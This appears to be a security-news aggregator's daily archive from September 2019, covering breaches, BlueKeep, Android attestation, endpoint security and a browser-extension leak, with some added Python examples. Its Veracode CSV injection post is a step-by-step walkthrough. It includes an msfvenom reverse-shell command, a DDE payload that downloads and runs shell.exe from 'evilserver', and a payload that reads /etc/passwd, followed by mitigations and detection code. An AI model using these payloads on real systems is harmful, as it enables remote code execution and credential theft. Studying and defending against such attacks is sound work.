Daily Archives: September 6, 2019

ACSC confirms the public release of BlueKeep exploit

The Australian Signals Directorate’s Australian Cyber Security Centre (ACSC) is aware of the overnight release of a working exploit for the vulnerability known as BlueKeep (CVE-2019-0708). Australian businesses and users of older versions of Windows should update their systems as soon as practically possible, before hackers further refine their tools and tradecraft in order to fully utilise this exploit.

More than 50% of Canadians Affected by Data Breaches

19 million Canadians are estimated to have been affected by data breaches between late 2018 and 2019, slightly more than half the population of the country. 

The figures were released by the Office of the Privacy Commissioner of Canada, which has received breach reports since mandatory breach notification under the Personal Information Protection and Electronic Documents Act (PIPEDA) took effect on November 1, 2018. Breach reports have nearly sextupled since the requirement came into force, with 446 incidents reported between November 2018 and June 2019.

One notable exception to the PIPEDA reporting requirements is Canadian political parties, which are not required to report data breaches, and often compile large amounts of data on voters. 

Hacking or “internal bad actors” account for the majority of the data breaches reported, with unintentional data leaks and the loss or theft of equipment comprising the bulk of the remainder.


The post More than 50% of Canadians Affected by Data Breaches appeared first on Adam Levin.

Attention Facebook Users: Here’s What You Need to Know About the Recent Breach

With over 2.4 billion monthly active users, Facebook is the biggest social network worldwide. And with so many users come tons of data, including some personal information that may now potentially be exposed. According to TechCrunch, a security researcher found an online database exposing 419 million user phone numbers linked to Facebook accounts.

It appears that the exposed server wasn’t password-protected, meaning that anyone with internet access could find the database. This server held records containing a user’s unique Facebook ID and the phone number associated with the account. In some cases, records also revealed the user’s name, gender, and location by country. TechCrunch was able to verify several records in the database by matching a known Facebook user’s phone number with their listed Facebook ID. Additionally, TechCrunch was able to match some phone numbers against Facebook’s password reset feature, which partially reveals a user’s phone number linked to their account.

It’s been over a year since Facebook restricted public access to users’ phone numbers. And although the owner of the database wasn’t found, it was pulled offline after the web host was contacted. Even though there has been no evidence that the Facebook accounts were compromised as a result of this breach, it’s important for users to do everything they can to protect their data. Here are some tips to keep in your cybersecurity arsenal:

  • Change your password. Many people reuse a small set of passwords across all of their accounts. While this makes credentials easier to remember, it also means that one leaked password opens more than one account. Use a unique password for every one of your accounts, or employ a password manager.
  • Enable two-factor authentication. While a strong and unique password is a good first line of defense, enabling app-based two-factor authentication across your accounts will help your cause by providing an added layer of security.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Attention Facebook Users: Here’s What You Need to Know About the Recent Breach appeared first on McAfee Blogs.

Trust but verify attestation with revocation

Posted by Rob Barnes & Shawn Willden, Android Security & Privacy Team
[Cross-posted from the Android Developers Blog]

Billions of people rely on their Android-powered devices to securely store their sensitive information. A vital component of the Android security stack is the key attestation system. Android devices since Android 7.0 are able to generate an attestation certificate that attests to the security properties of the device’s hardware and software. OEMs producing devices with Android 8.0 or higher must install a batch attestation key provided by Google on each device at the time of manufacturing.

These keys might need to be revoked for a number of reasons, including accidental disclosure, mishandling, or suspected extraction by an attacker. When this occurs, the affected keys must be revoked immediately to protect users. The security of any public-key infrastructure depends on the robustness of its key revocation process.

All of the attestation keys issued so far include an extension that embeds a certificate revocation list (CRL) URL in the certificate. We found that the CRL and Online Certificate Status Protocol (OCSP) mechanisms were not flexible enough for our needs, so we set out to replace the revocation system for Android attestation keys with something that is flexible and simple to maintain and use.

Our solution is a single TLS-secured URL (https://android.googleapis.com/attestation/status) that returns a list containing all revoked Android attestation keys. This list is encoded in JSON and follows a strict format defined by JSON schema. Only keys that have non-valid status appear in the list, so it is not an exhaustive list of all issued keys.

This system allows us to express more nuance about the status of a key and the reason for the status. A key can have a status of REVOKED or SUSPENDED, where revoked is permanent and suspended is temporary. The reason for the status is described as either KEY_COMPROMISE, CA_COMPROMISE, SUPERSEDED, or SOFTWARE_FLAW. A complete, up-to-date list of statuses and reasons can be found in the developer documentation.

The CRL URLs embedded in existing batch certificates will continue to operate. Going forward, attestation batch certificates will no longer contain a CRL extension. The status of these legacy certificates will also be included in the attestation status list, so developers can safely switch to using the attestation status list for both current and legacy certificates. An example of how to correctly verify Android attestation keys is included in the Key Attestation sample.
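The status-list check described above, as an added example in Python (not code from the Key Attestation sample): it parses a list in the published shape, an "entries" object keyed by certificate serial number, and reports any certificate in a chain whose key is REVOKED or SUSPENDED. Two things are assumptions: that the key is the serial in lowercase hexadecimal without leading zeros, and the sample list itself, whose serials are invented. Check the developer documentation for the exact field names before relying on this.

```python
"""Check an Android attestation certificate chain against the attestation status list."""
import json
import urllib.request
from dataclasses import dataclass
from typing import Dict, Iterable, List

STATUS_URL = "https://android.googleapis.com/attestation/status"

# Statuses named in the post; the live list may define more, so parsing is strict.
KNOWN_STATUSES = {"REVOKED", "SUSPENDED"}

# Constructed sample in the assumed shape of the published list. The serial
# numbers are invented; keys are the certificate serial in hexadecimal.
SAMPLE_STATUS_LIST = json.dumps({
    "entries": {
        "5cd0ab1d2cb4f0c5": {"status": "REVOKED", "reason": "KEY_COMPROMISE"},
        "9F2A3B4C5D6E7F80": {"status": "SUSPENDED", "reason": "SOFTWARE_FLAW"},
    }
})


@dataclass(frozen=True)
class Finding:
    serial: int
    status: str
    reason: str


def serial_key(serial: int) -> str:
    """Lookup key for a certificate serial: lowercase hex without leading zeros (assumed format)."""
    if serial < 0:
        raise ValueError("X.509 serial numbers are non-negative")
    return format(serial, "x")


def parse_status_list(text: str) -> Dict[str, dict]:
    """Parse the JSON list and normalise its keys so lookups are exact.

    Only keys with a non-valid status appear, so a missing serial means
    "not revoked"; an unparseable list must therefore be treated as a failure.
    """
    doc = json.loads(text)
    entries = doc.get("entries") if isinstance(doc, dict) else None
    if not isinstance(entries, dict):
        raise ValueError("status list has no 'entries' object")
    normalised: Dict[str, dict] = {}
    for key, entry in entries.items():
        status = entry.get("status") if isinstance(entry, dict) else None
        if status not in KNOWN_STATUSES:
            raise ValueError(f"unexpected status {status!r} for serial {key}")
        normalised[key.lower().lstrip("0") or "0"] = entry
    return normalised


def fetch_status_list(url: str = STATUS_URL, timeout: float = 10.0) -> Dict[str, dict]:
    """Download the live list over TLS. Any failure raises: fail closed, never fall
    back to an empty list, because an empty list would mean "every key is valid"."""
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        if resp.status != 200:
            raise RuntimeError(f"status list returned HTTP {resp.status}")
        return parse_status_list(resp.read().decode("utf-8"))


def check_chain(serials: Iterable[int], status_list: Dict[str, dict]) -> List[Finding]:
    """Return a Finding for every certificate in the chain that is revoked or suspended.

    Pass the serial of every certificate from the root down to the attestation
    certificate: the batch key is an intermediate, so its serial is the one most
    likely to be listed.
    """
    findings = []
    for serial in serials:
        entry = status_list.get(serial_key(serial))
        if entry is not None:
            findings.append(Finding(serial, entry["status"], entry.get("reason", "")))
    return findings


def chain_is_trusted(serials: Iterable[int], status_list: Dict[str, dict]) -> bool:
    """True only when no certificate in the chain has an entry (REVOKED or SUSPENDED)."""
    return not check_chain(serials, status_list)


if __name__ == "__main__":
    offline = parse_status_list(SAMPLE_STATUS_LIST)
    for f in check_chain([0x1, 0x5CD0AB1D2CB4F0C5, 0x9F2A3B4C5D6E7F80], offline):
        print(f"serial {f.serial:x}: {f.status} ({f.reason})")
```

Two details matter in practice. Absence from the list means "not revoked", so a download failure must fail closed, which is why fetch_status_list raises instead of returning an empty dictionary. And every serial in the chain should be checked, not just the leaf's: a SUSPENDED intermediate is as disqualifying as a REVOKED one until its status changes.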

Seeker – Accurately Locate Smartphones using Social Engineering

Seeker comes preinstalled in BlackArch Linux. If you are using Kali Linux, Parrot OS or another Linux-based distribution, see the install information in the full post. Seeker is developed by thewhiteh4t. Seeker is a proof of concept and is for educational purposes only; Seeker shows what data ...

The post Seeker – Accurately Locate Smartphones using Social Engineering appeared first on HackingVision.

How the California Consumer Privacy Act (CCPA) will affect you and your business | TECH(talk)

The California Consumer Privacy Act (CCPA) is, in some ways, similar to Europe's GDPR. The law, which takes effect in 2020, gives individual users more control over their own data; users can even opt out of having companies sell their personal data. As the compliance deadline approaches, CSO Online contributor Maria Korolov and senior editor Michael Nadeau discuss with Juliet how CCPA may shift business models, change online behavior and reveal where exactly our data has been. Some tech companies, like Google, are even trying to exempt themselves from regulation. Failure to adhere to the rule could be an "extinction level" event.

ST08: Uncovering the opportunity of EDR with Chris Young, Ash Kulkarni, Josh Zelonis, and David Barron

In this exclusive episode featuring McAfee CEO Chris Young, we’re exploring EDR guided investigation and the opportunities it provides for reducing alert noise, maximizing the productivity of cybersecurity teams, and reducing triage and remediation times. Chris is joined by McAfee’s Chief Product Officer Ash Kulkarni, Forrester’s Principal Analyst Josh Zelonis, and GM Financial’s Assistant Vice President of Cybersecurity David Barron, who each provide their unique perspectives on how guided investigation can address the security challenges and needs of today’s enterprises.

The post ST08: Uncovering the opportunity of EDR with Chris Young, Ash Kulkarni, Josh Zelonis, and David Barron appeared first on McAfee Blogs.

Maintaining Effective Endpoint Security 201

Today’s enterprises are faced with unique, modern-day issues. Many are focused on adopting more cloud-based services and reducing infrastructure footprint, all while the number of devices accessing the environment grows. This, in turn, requires security teams to create different levels of access, policies, and controls for users. Plus, as these businesses expand, some unexpected security issues may arise, such as alert volume, lack of visibility, complicated management, and longer threat dwell times. To strike a balance between business objectives and a healthy security posture, IT teams can implement some of the tactics we recommended in our Effective Endpoint Security Strategy 101 blog, such as virtual private networks (VPNs), proper employee security training, and machine learning (ML) and artificial intelligence (AI) technology for predictive analysis. But with the threat landscape evolving every day, is there more these organizations can do to sustain an effective endpoint strategy while supporting enterprise expansion? Let’s take a look at how teams can bolster their endpoint security strategy.

Managing the Many Vulnerabilities

As enterprises try to keep pace with the number of endpoints, as well as the threats and vulnerabilities that come with these devices, multiple levels of security need to be implemented to maintain and expand a sustainable security posture. One way for enterprise security teams to keep track of these vulnerabilities and threats is through the use of vulnerability management. This process involves the identification, classification, and prioritization of vulnerabilities when flaws arise within a system.

For vulnerability management to be successful, security teams must have full visibility into an endpoint environment. This awareness will help teams proactively mitigate and prevent the future exploitation of vulnerabilities. Plus, with endpoints always evolving and being added, a vulnerability management system is a necessity for expanding effective endpoint security.

Beware of Privilege Escalation

Due to the sheer number of endpoints being introduced to the enterprise environment, the likelihood that at least one endpoint is vulnerable increases. And with vulnerable endpoints creating gateways to important enterprise data, cybercriminals often attempt to exploit a bug or flaw in an endpoint system to gain elevated access to sensitive resources. This tactic is known as privilege escalation.

To stop privilege escalation attacks in their tracks, security teams can apply the principle of least privilege: users are granted only the privileges required to do their job. That way, if attackers compromise an exposed endpoint, they cannot use it to reach troves of corporate data. The risk of privilege escalation is also reduced by prompt patching and by adding layers of security controls at different stages of the endpoint.

Administering Enterprise Access

Who can access specific assets and resources within an enterprise is an important discussion to be had for any endpoint security strategy. Not all users should have access to all resources across the network and if some users are given too much access it can lead to increased exposure. This is where access management comes into play.

Maintaining a secure endpoint environment requires security teams to identify, track, and manage specific, authorized users’ access to a network or application. By creating differentiated levels of access across the board, teams can ensure they are prioritizing key stakeholders while still controlling the number of potential exposure points. Beyond monitoring accessibility, it’s critical that security teams know where data is headed and are able to control the flow of information. The good news? Teams can rely on a solution such as McAfee Data Loss Prevention (DLP) to assist with this, as it can help security staff protect sensitive data on-premises, in the cloud, or at the endpoints.

Coaching Users on Passwords and Identity Management

Passwords are the first line of defense against cybercriminals. If a cybercriminal guesses a password, they have access to everything that password protects, so the more complex and unique a password is, the better. Beyond encouraging complex password creation, it’s crucial that security teams make multifactor authentication a standard part of the user login process, ideally enforced through single sign-on (SSO) so that it applies to every application consistently. These are easy-to-use tools that add more protective layers around a device and its accounts.

Assessing the Risks

As a security team, assessing the overall risk present in your organization’s current environment is a top priority. From checking for potential cyberthreats to monitoring and evaluating endpoints to ensure there are no exposures, it’s important that teams do their due diligence and conduct a comprehensive risk assessment. Teams need to make risk assessments a routine aspect of their overall security strategy, as new risks are always popping up. To do so in a proper and timely manner, better visibility is required, and teams should get into the habit of red teaming and of leveraging automation for response and remediation. McAfee MVISION Endpoint Detection and Response (EDR) can also help teams get ahead of modern threats with AI-guided investigations that surface relevant risks, and automate and remove the manual labor of gathering and analyzing evidence.

Once a risk assessment has been done, security teams must take immediate action on the results. After potential threats are identified and analyzed with the help of McAfee MVISION EDR, teams must work to correct any potential negative impact these risks may have on an enterprise, resources, individuals, or the endpoint environment. By leveraging a centralized management tool, enterprise teams can do just that — reducing alert noise, elevating critical events, and speeding up the ability to respond and harden endpoints when risks or areas of exposure are identified.

Utilizing Advanced Security Solutions

To cover all the bases, it is vital teams leverage multiple endpoint security solutions that have proactive technology built-in and are collaborative and integrative. Take McAfee MVISION Endpoint and MVISION Mobile for example, which both have machine learning algorithms and analysis built into their architecture to help monitor and identify malicious behavior. Additionally, McAfee Endpoint Security delivers centrally managed defenses, like machine learning analysis and endpoint detection, to protect systems with multiple, collaborative defense and automated responses.

Advanced security solutions bring an endpoint security strategy full circle. Take the time to research and then invest in technology that is suitable for your enterprise’s needs. Growth does not have to be hindered by security; in fact, having the two work in tandem will ensure longevity and stability.

To learn more about effective endpoint security strategy, be sure to follow us @McAfee and @McAfee_Business.

The post Maintaining Effective Endpoint Security 201 appeared first on McAfee Blogs.

Data Extraction to Command Execution CSV Injection

As web applications become more complex and more data driven, the ability to export data from a web application is becoming more common. I work as a principal penetration tester on Veracode’s MPT team, and the majority of web applications that we test nowadays have the ability to export data in CSV format. Microsoft Excel is among the most common software installed in corporate environments, and it opens CSV files (in most cases it is the default handler for them). It should be noted that this type of attack also affects LibreOffice Calc, which likewise interprets the payload as a formula.

Attack Requirements

In order to perform a basic attack, a number of requirements are needed. An attacker needs the ability to inject a payload into the tables within the application. The application needs to allow a victim to download this data into CSV format that can then be opened in Excel. This would cause the payload to be interpreted as an Excel formula and run.

Basic Attack

1. Search the application to find a location where any data input can be extracted.

2. Inject the payload =HYPERLINK("http://www.veracode.com", "Click for Report") into that field.

3. Confirm the application is vulnerable to this type of attack. Extract the data and confirm the payload has been injected by opening the CSV file in Microsoft Excel.

4. A "Click for Report" link then appears in the Excel file. This indicates the payload was injected correctly.

In this scenario, when the victim clicks on the link, it will take them to the Veracode website. This type of attack might not seem too serious, but consider the following:

Instead of redirecting an end user to the Veracode website, we could redirect the end user to a server we controlled, which contained a clone of the website. We could then ask the victim to authenticate to our clone website, allowing us as the attacker to steal his or her credentials. We could then use these credentials on the original website and have access to all his or her personal information or any functionality the account has access to. There are also a number of other attacks possible with this type of formula injection, including exfiltrating sensitive data, obtaining remote code execution, or even reading the contents of certain files under the right circumstances. We can look at one of these types of attacks below.

Advanced Attack – Remote Command Execution

A more advanced attack would use the same method as above but with a different payload, which would lead to remote code execution. This type of attack does depend on a number of factors and might not always be possible. However, it’s still worth considering and also highlights how serious this vulnerability can be under the right circumstances.

Attack in Steps

1. We’ll use a shell.exe file, which can contain whatever we want to execute on the system but, in this scenario, we will use msfvenom to create a reverse Meterpreter payload.

msfvenom -p windows/meterpreter/reverse_tcp  -a x64 --platform Windows LHOST=<IP Address> LPORT=1234 -f exe > shell.exe

2. We also need to set up a listener that will wait for the connect back to us once the shell.exe payload has been executed on the victim’s machine. We will use Metasploit multi/handler for this example. We need to set the LPORT and also make sure the IP address is correct.

3. We also need to host the shell.exe payload so it can be downloaded. For this, I used the following command, python -m SimpleHTTPServer 1337, which will set up a simple web server in the current directory on my system. A real attack might host this on a compromised web server.

4. Once all this has been set up, we could then inject the payload into the application and wait for a victim to download the CSV file and click on the cell with the payload in it.

=cmd|' /C powershell Invoke-WebRequest "http://evilserver:1337/shell.exe" -OutFile "$env:Temp\shell.exe"; Start-Process "$env:Temp\shell.exe"'!A1

Breakdown of Payload

  • The cell begins with =cmd|'...'!A1, a DDE (Dynamic Data Exchange) reference that makes Excel launch cmd.exe with the quoted command line. That command runs PowerShell’s Invoke-WebRequest to download shell.exe from our evilserver on port 1337. Note that Invoke-WebRequest was introduced in PowerShell 3.0, so on a host that only has PowerShell 2.0 the download won’t work.
  • -OutFile saves shell.exe into the user’s temp directory. We use the temp directory because it is a folder any user can write to.
  • Start-Process then executes the downloaded shell.exe payload.

5. Once the victim opens the file, the CSV injection payload would run, but Excel first presents a “Remote Data Not Accessible” warning. Most victims assume the file came from a legitimate source and click Yes to view the data. It should also be noted that in this scenario the Excel file is empty apart from our payload; in a real-world attack, the file would be populated with information from the application.

6. Once the victim clicks Yes, within a few moments Metasploit receives a reverse connection from the victim’s host.

7. At this point, the attacker can perform a number of tasks depending on the level of access he or she has obtained. This includes, but is not limited to, stealing passwords from memory, attacking other systems in the network (if this host is connected to a network), taking over users’ webcams, etc. In fact, under the right circumstances, it would be possible to compromise an entire domain using this attack.

When testing for CSV injection, testers mostly use a simple payload, for a number of reasons. It’s not uncommon to demonstrate this type of attack with a HYPERLINK payload like the one above, or with a simple DDE payload such as =cmd|'/C cmd.exe'!A1.

Some might also use the following payload, depending on the target’s operating system and spreadsheet application: ='file:///etc/passwd'#$passwd.A1

When the CSV is opened in LibreOffice Calc on a Linux system, this reads the first line of /etc/passwd into the cell.

Mitigating the Risk

The best way to mitigate this type of attack is to make sure all user input is filtered so that only expected characters are allowed. Client-supplied input should always be considered unsafe and treated with caution when processed. CSV injection, like many other web attacks, is a side effect of weak input validation. To mitigate CSV injection, a default-deny ("whitelist") regular expression should be used to filter all data submitted to the application. Because Excel and LibreOffice treat a cell that begins with an equals sign (=), plus sign (+), minus sign (-), or "at" symbol (@) as a formula, we recommend filtering these out so that no cell begins with one of them; a leading tab or carriage return should be handled the same way, since Excel strips them before checking for a formula. Where a value legitimately starts with such a character (a negative number, a phone number with a leading +), the alternative is to prefix the cell with a single quote (') at export time, which spreadsheets treat as a text marker. Because the payload executes in the spreadsheet rather than on the server, the export routine must escape its output and not rely on the input form alone. Any element that could appear in a report is a potential target for Excel/CSV injection and should be validated with this in mind.
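As an added example (not code from the Veracode post), the following Python shows both sides of the problem described in this article: a CSV export routine that neutralizes formula-triggering cells the way the mitigation above recommends, and a scanner that flags the payload families shown earlier (HYPERLINK, DDE, LibreOffice file://) in an existing CSV. The sample rows, the evil.example host and the family names are constructed for illustration, and the detection patterns are illustrative rather than an exhaustive signature set.

```python
import csv
import io
import re
from typing import Iterable, List, Optional, Sequence, Tuple

# Characters that make Excel and LibreOffice Calc evaluate a cell as a formula when
# they lead the cell. Leading whitespace (including tab and carriage return) is
# stripped before the check because spreadsheet importers ignore it too.
FORMULA_TRIGGERS = ("=", "+", "-", "@")

# Payload families from the post, named so reports can tell them apart.
# The patterns are illustrative, not an exhaustive signature set.
PAYLOAD_PATTERNS = [
    ("hyperlink", re.compile(r"^\s*=\s*HYPERLINK\s*\(", re.IGNORECASE)),
    ("dde", re.compile(r"^\s*=\s*\w+\s*\|")),                             # =cmd|'/C ...'!A1
    ("file-link", re.compile(r"^\s*=\s*['\"]?file://", re.IGNORECASE)),  # LibreOffice link
]

# Constructed sample export: one honest row, the three payloads from the post,
# and a benign comment that still starts with a trigger character.
SAMPLE_ROWS = [
    ["user", "comment", "balance"],
    ["alice", "looks fine", 12.5],
    ["mallory", '=HYPERLINK("http://evil.example/", "Click for Report")', -3],
    ["mallory", "=cmd|'/C cmd.exe'!A1", 0],
    ["mallory", "='file:///etc/passwd'#$passwd.A1", 0],
    ["bob", "+1 for this, -1 for that", 7],
]


def _is_number(text: str) -> bool:
    """A plain numeric literal such as -3 or 12.5 is data, not a formula."""
    try:
        float(text)
        return True
    except ValueError:
        return False


def _looks_like_formula(text: str) -> bool:
    stripped = text.lstrip()
    return stripped.startswith(FORMULA_TRIGGERS) and not _is_number(stripped)


def classify(cell: str) -> Optional[str]:
    """Name the payload family of a text cell, "formula-prefix" for any other
    formula-looking cell, or None when a spreadsheet would treat it as data."""
    for family, pattern in PAYLOAD_PATTERNS:
        if pattern.search(cell):
            return family
    return "formula-prefix" if _looks_like_formula(cell) else None


def neutralize(value: object) -> str:
    """Render one value for CSV output so a spreadsheet treats it as text.

    Real numbers pass through unchanged (a leading "-" on a number is harmless).
    Text that would be read as a formula gets a leading single quote, which Excel
    and Calc honour as a text marker. Commas, quotes and newlines are left to
    csv.writer, which quotes every field and doubles embedded quotes, so a value
    cannot close its own cell and start another one.
    """
    if value is None:
        return ""
    if isinstance(value, (int, float)):
        return str(value)
    text = str(value)
    return "'" + text if _looks_like_formula(text) else text


def export_csv(rows: Iterable[Sequence[object]], safe: bool = True) -> str:
    """Write rows as CSV; safe=False reproduces the vulnerable export for comparison."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    for row in rows:
        writer.writerow([neutralize(v) if safe else ("" if v is None else str(v)) for v in row])
    return buf.getvalue()


def scan_csv(text: str) -> List[Tuple[int, int, str]]:
    """Detection side: (row, column, family) for every cell a spreadsheet would execute."""
    findings = []
    for r, row in enumerate(csv.reader(io.StringIO(text))):
        for c, cell in enumerate(row):
            family = classify(cell)
            if family is not None:
                findings.append((r, c, family))
    return findings


if __name__ == "__main__":
    print("vulnerable export flags:", scan_csv(export_csv(SAMPLE_ROWS, safe=False)))
    print("hardened export flags:  ", scan_csv(export_csv(SAMPLE_ROWS)))
```

The numeric-literal exception is the practical compromise: a balance of -3 stays a number, while "+1 for this, -1 for that" is still prefixed because Excel would otherwise try to evaluate it. The DDE and file:// payloads are caught by the same leading-character rule as everything else; the named patterns exist only so a report can say which family was injected.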

In summary, CSV injection is not a new attack vector, but it’s one that developers often forget about. As more web applications have the ability to extract data, it’s one that could have serious consequences if steps are not taken to mitigate the risk it poses. In addition, developers should be checking user input for other types of attacks like XSS.


This Week in Security News: New Zero-Day Vulnerability Findings and Mobile Phishing Scams

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn how music festival goers need to be on guard for phishing attacks when trying to find a lost iPhone. Also, read how Trend Micro researchers went public with their findings on a zero-day vulnerability impacting the Android mobile operating system. 

Read on:

Finding a Better Route to Router and Home Network Security

New research published reveals that many of the home routers sold in the US today are still missing basic protections. Read on to learn about how your router is exposed to hackers, what attacks are possible and how to protect your router and smart home with Trend Micro’s help.

Hiding in Plain Text: Jenkins Plugin Vulnerabilities

Jenkins, a widely used open-source automation server that allows DevOps developers to build, test, and deploy software efficiently and reliably, recently published security advisories that included problems associated with plain-text-stored credentials. Vulnerabilities that affect Jenkins plugins can be exploited to siphon off sensitive user credentials.

Big Tech Companies Meeting with U.S. Officials on 2020 Election Security

Facebook, Google, Twitter and Microsoft met with government officials in Silicon Valley on Wednesday to discuss and coordinate on how best to help secure the 2020 American election, kicking off what is likely to be a marathon effort to prevent the kind of foreign interference that roiled the 2016 election.

Glupteba Campaign Hits Network Routers and Updates C&C Servers with Data from Bitcoin Transactions

Trend Micro recently caught a malvertising attack distributing the malware Glupteba, an older malware that was previously connected to a campaign named Operation Windigo and distributed through exploit kits to Windows users. This blog discusses features of this malware and security recommendations to avoid this kind of attack.

Spam Campaign Abuses PHP Functions for Persistence, Uses Compromised Devices for Evasion and Intrusion

A Trend Micro honeypot detected a spam campaign that uses compromised devices to attack vulnerable web servers. After brute-forcing devices with weak access credentials, the attackers use them as proxies to forward a base64-encoded PHP script to web servers, which then send an email with an embedded link to a scam site to specific email addresses.

Google, Trend Micro, IBM’s Red Hat ID’d Among Top Container Security Vendors

Container security presents a hot growth opportunity for the channel, with the global market expected to more than quadruple by 2024, reaching nearly $2.2 billion. North America is expected to account for the highest market share through 2024.

iPhone Theft Leads to Stolen Apple Credentials Through Phishing Attack

Of the hundreds who had their cellphones stolen or lost during the Lollapalooza music festival, one woman’s attempt to find her iPhone led her to a phishing scheme that stole her credentials. Like a regular phishing scheme, she received a seemingly legitimate text message with a link to what looked like the Find My iPhone webpage, but realized they were fake after she entered her credentials.

Ransomware Attacks Hit Taiwan Hospitals and Dubai Firm

Two notable ransomware attacks targeted several hospitals in Taiwan and a contracting company in Dubai last week. The ransomware attack in Taiwan prevented several hospitals from accessing their information systems, while the attack in Dubai froze a company’s systems.

Trend Micro, AWS Deliver Transparent, Inline Network Security for Enterprise Clouds

Trend Micro is taking new steps to help enterprises using Amazon Web Services to better deliver network security for cloud and hybrid operations. IDN looks at Trend Micro Cloud Network Protection, along with the firm’s new XDR solution.

Sextortion Scheme Deployed by ChaosCC Hacker Group Demands US$700 in Bitcoin

A recently discovered email scheme reportedly deployed by a hacking group called ChaosCC claims to have hijacked recipients’ computers and recorded videos of them while watching adult content. This sextortion scheme reportedly attempts to trick recipients into paying US$700 in bitcoin.

Unusual CEO Fraud via Deepfake Audio Steals US$243,000 From U.K. Company

This fraud incident used deepfake audio, that is, artificial intelligence (AI)-generated audio, and was reported to have conned US$243,000 from a U.K.-based energy company. According to a report, in March the fraudsters used voice-generating AI software to mimic the voice of the chief executive of the company’s Germany-based parent company in order to induce an illegal fund transfer.

Zero-Day Disclosed in Android OS

Yesterday, Trend Micro researchers went public with their findings on a zero-day vulnerability impacting the Android mobile operating system after Google published the September 2019 Android Security Bulletin, which didn’t include a fix for their bug. The vulnerability resides in how the Video for Linux (V4L2) driver that’s included with the Android OS handles input data.

Container Security in Six Steps

Containers optimize the developer experience. However, as with any technology, there can be tradeoffs in using containers. This blog contains six steps developers can follow to minimize risks when building in containers.

Are you well-versed on Trend’s suggestions for protecting your router and smart home from hackers? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay.

The post This Week in Security News: New Zero-Day Vulnerability Findings and Mobile Phishing Scams appeared first on .

SECURITY ALERT: Massive Data Leak Revealed the Sensitive Information of Millions of People

The web surfing history of millions of people was intercepted yesterday in a huge data leak. Large Swedish companies, such as Volvo, SAS, Ericsson, Husqvarna, and SKF have been affected, as originally reported by the Swedish newspaper Dagens Nyheter. About 40,000 of the people involved in the incident are allegedly Swedes.

Spyware in Browser Extensions Enabled the Attack

The data spill was caused by spyware code in Chrome and Firefox add-ons, which allowed the browsing history of millions of users to be harvested and sold.

A part of the leaked data comes from some of the largest organizations in Sweden. The database contained information such as discussions between employees, downloaded files, and confidential internal information. More precisely, it was possible to see exactly what people did online, and although the information was considered anonymous, their identities could be confirmed.

The Failure of a SpaceX Rocket Engine Was Also Leaked

According to security engineer Sam Jadali, other major international companies have been involved as well. For instance, information from the space company SpaceX regarding the failure of a rocket engine was revealed. The vehicle was used to transport astronauts to and from the International Space Station (ISS).

The Company Behind the Data Leak

The information was collected and sold by Nacho Analytics, which is ending its activity now that the leak has been brought to light.

This is the pop-up message that is currently being displayed on their website:

“Nacho Analytics is closing all remaining accounts, and sending refunds to our existing customers for their recent payments. It will take a few days to work through this process. We appreciate your patience. If you are an active customer, please check your email for more detailed information.

Our limited site is active to offer customer support during this transition.”


Browsing habits are a way of studying customer patterns and monitoring competitors. This leak is similar to the Cambridge Analytica scandal, in which Facebook data was abused for political campaigns, writes SVT.

Why Did the Data Leak Happen?

The reason is that many companies use browser-based tools. And if an employee accesses a browser extension compromised by spyware, the activity within the tool can also be intercepted by cybercriminals.

Our CEO, Morten Kjaersgaard, has spoken with IT-Kanalen about how serious the problem is.

In his view, the issue seems to be greater than we realize. Specifically, any extension could be used by cybercriminals to access sensitive data. The reason is that these add-ons are not part of a company’s internal system, but developed by third parties. When users install a plugin in a browser, a port opens to the underlying engine – in this case, Chrome or Firefox – where it gets access to data other than it should have access to.

On a more positive note, the issue was discovered early, and this way we can get the chance to better understand it and find solutions. We should somehow be glad that the attack did not hit IE, which is more commonly used because this way the damage would probably have been significantly higher, says Morten Kjaersgaard.

How can we reduce the risks?

The simple answer would be to disable all plugins. But since this is rarely a viable solution, here are the recommendations for companies and consumers.

Advice for Companies

Companies should follow several steps. First of all, their IT department should design some form of policy-based system for deciding which add-ons may be installed, and should also define how those add-ons are handled and monitored. Existing solutions for this are partially integrated into Chrome already.

Secondly, traffic should be monitored in real time. This way, companies can detect early on whether systems connect and send data to suspicious locations. If this practice is combined with DNS protection and IP filtering, you will have a solid security foundation for your company.
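The allowlist policy described above, as an added example that is not Heimdal's code or a browser feature: it audits installed extensions against an IT allowlist and flags the manifest permissions that let an extension read browsing activity on every site (the extension IDs, policy and manifests are constructed).

```python
"""Audit installed browser extensions against an allowlist policy.

Added example, not Heimdal's code or a Chrome tool: the policy, the
extension IDs and the manifests below are all constructed for illustration.
"""
import json

# Chrome manifest v2 permissions that let an extension observe or alter
# browsing on every site, which is exactly what a leaky extension needs.
RISKY_PERMISSIONS = {"<all_urls>", "tabs", "history", "webRequest", "webNavigation"}

def is_broad_host(perm: str) -> bool:
    """Match host patterns covering all sites, e.g. '*://*/*' or 'https://*/*'."""
    return perm.endswith("://*/*")

def audit_extension(ext_id: str, manifest: dict, allowlist: dict) -> list:
    """Return findings for one extension; an empty list means it passes."""
    findings = []
    if ext_id not in allowlist:
        findings.append("not on the IT allowlist")
    perms = set(manifest.get("permissions", [])) | set(manifest.get("optional_permissions", []))
    broad = sorted(p for p in perms if p in RISKY_PERMISSIONS or is_broad_host(p))
    if broad:
        findings.append("can read browsing activity via " + ", ".join(broad))
    return findings

def audit_all(installed: dict, allowlist: dict) -> dict:
    """Map extension ID to findings, keeping only extensions that need attention."""
    result = {}
    for ext_id, raw in installed.items():
        findings = audit_extension(ext_id, json.loads(raw), allowlist)
        if findings:
            result[ext_id] = findings
    return result

# Constructed policy: IT approved a single password-manager extension.
ALLOWLIST = {"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa": "password manager (approved)"}

# Constructed manifests standing in for each extension's manifest.json.
INSTALLED = {
    "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa": json.dumps(
        {"name": "Password Manager", "permissions": ["storage", "activeTab"]}),
    "bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb": json.dumps(
        {"name": "Coupon Helper", "permissions": ["tabs", "<all_urls>", "webRequest"],
         "optional_permissions": ["history"]}),
}

if __name__ == "__main__":
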